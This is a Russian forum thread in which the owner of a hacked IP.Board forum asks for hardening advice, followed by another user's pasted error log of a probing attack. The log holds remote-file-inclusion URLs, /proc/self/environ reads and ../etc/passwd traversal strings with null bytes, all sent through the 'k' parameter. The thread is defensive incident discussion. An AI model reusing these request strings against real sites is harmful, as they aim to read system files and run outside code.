Перейти к содержимому
Открыть в приложении

Удобный способ просмотра. Узнать больше.
Дизайн и модификация Invision Community

Полноэкранное приложение на главном экране с push-уведомлениями, медалями и многим другим.

Чтобы установить это приложение на iOS и iPadOS
  1. Нажмите иконку «Поделиться» в Safari
  2. Прокрутите меню и нажмите На экран «Домой».
  3. Нажмите Добавить в правом верхнем углу.
Чтобы установить это приложение на Android
  1. Нажмите меню из трёх точек (⋮) в правом верхнем углу браузера.
  2. Нажмите Добавить на главный экран или Установить приложение.
  3. Подтвердите, нажав Установить.
Русский язык для Invision Community 5

Хакнули форум v3.1.4

Помогите пожалуйста защитится от хакинга.

Сосбтвенно адрес _http://help-icq.ru

Рекомендованные сообщения

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

Помогите пожалуйста защитится от хакинга.

Использовать нормальный хостинг.

Не использовать нуленные программы. Если в непонятно откуда скачанных DLE или в IP.Board - е уже предусмотрен черный ход, то не защитится уже не чем.

Хуки скачивать только с официальных сайтов. Взломов через хуки еще не видел, но возможность вполне вероятная.

Ну естественно следить за обновлением используемых официальных программ.

 

И все.

 

Сломать нормальный пропаченный IP.Board очень сложно.

  • Автор

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

Можно подробнее про .htpasswd?

Можно подробнее про .htpasswd

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

  • Автор

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

Вродебы там всё намного проще.

Я сейчас посмотрел логи входа в админку.

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Узнать пароль к htpasswd так же можно.

 

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

Это ложное ощущение безопасности. Но лишняя защита не когда не бывает лишней.

 

Хотя проще, ограничить по минимуму количество людей с доступом в АЦ.

Пароль должен быть реально сложный.

У админа "логин" и "отображаемое имя" никогда не должны совпадать.

 

Я не использую htpasswd.

 

Так как мой акк был удалён, а его нет.

А смысл его при взломе, было оставлять? Чтобы восстановить было проще?

  • Автор

Всем спасибо.

Тему можно закрыть.

Тема может пригодиться другим. Любая тема, где есть полезные советы.

  • Автор

Я ведь не сказал "тему можно удалить".

Тема ведь останется. А если у кого-то будет похожий вопрос то создаст новую...

И еще раз писать то же самое. Добрые ...

Самое неприятное в любом взломе - это не факт самого взлома, а неизвестность:

- Кто и как именно взломал?

- Какой уровень доступа получил?

- С какой целью?

- Что именно и в каком количестве сделано?

- Не оставлено ли закладок "на будущее"?

 

Не найдя точные достоверные ответы, нельзя гарантировать, что взлом не повторится вновь. Если хотя бы на один из вопросов ответа нет - проводить полный аудит безопасности всего и вся, долго и основательно.

 

С сабжевого форума поржал.

проводить полный аудит безопасности

Смысл? Если с самого начала была высокая вероятность закладки.

А я и не про этот форум пишу. Топикстартер тут и не появится более, скорее всего, он же свою проблему "решил". А там у него - да, конечно, проверять смысла нет. Судя по всему, пиратская говносборка какого-то очередного "хакера", изначально напичканная левыми модами и правками. Да и сам форум такой форум - такая тематика, такой контент. В одной из тех с половиной тем, кажется, сам админ выкладывает т.н. "пинч" - генератор трояна, ворующего cookies, причем выкладывает в бинарном виде. Думаю, вы все понимаете и относительно форума, и относительно методики "взлома"? Тут и "закаладки" не нужны, с такими админами))

День добрый. Сегодня ночью посыпались ошибки следующего вида. Кто-то очень хотел найти какую-то уязвимость или что-то еще? Что за параметр "k"? Кто может прокомментировать? Спасибо.

 

Выдержки из лога. Всего было 108 строк. Полный лог во вложении.

 

 

log_id log_member log_date log_error log_error_code log_ip_address log_request_uri

18 0 1301948884 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

19 0 1301948886 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

20 0 1301948886 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

21 0 1301948888 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ

22 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

23 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

24 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

25 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

26 0 1301948890 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ%00

27 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ

28 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

29 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

30 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

31 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ%00

32 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=/proc/self/environ

33 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=28&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

 

...

 

123 0 1301948950 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd

124 0 1301948952 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=../../../../../../../../../../etc/passwd%00

125 0 1301948954 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd%00

error_logs.rar

'k' - это параметр, использующийся для валидации форм. Он проверяется в дюжине файлов, но всегда в такой:

if ( $this->request['k'] != $this->member->form_hash )

или в такой форме:

if ( $this->request['k'] == $this->member->form_hash

 

Эта форма абсолютно безопасна, поэтому вариантов всего два:

а) на каком-то из нулей на эту переменную привязан шелл;

б) какой-то наивный школьник балуется.

    •
    • Upvote 1

    Создайте аккаунт или войдите в него для комментирования

    Перейти к списку тем

    Аккаунт

    Навигация

    Поиск

    Поиск

    Настроить push-уведомления браузера
    Chrome (Android)
    1. Нажмите на иконку замка рядом с адресной строкой.
    2. Нажмите Права доступа -> Уведомления.
    3. Измените свои настройки.
    Chrome (компьютер)
    1. Нажмите на иконку замка в адресной строке.
    2. Выберите Настройки сайта.
    3. Найдите Уведомления и измените свои настройки.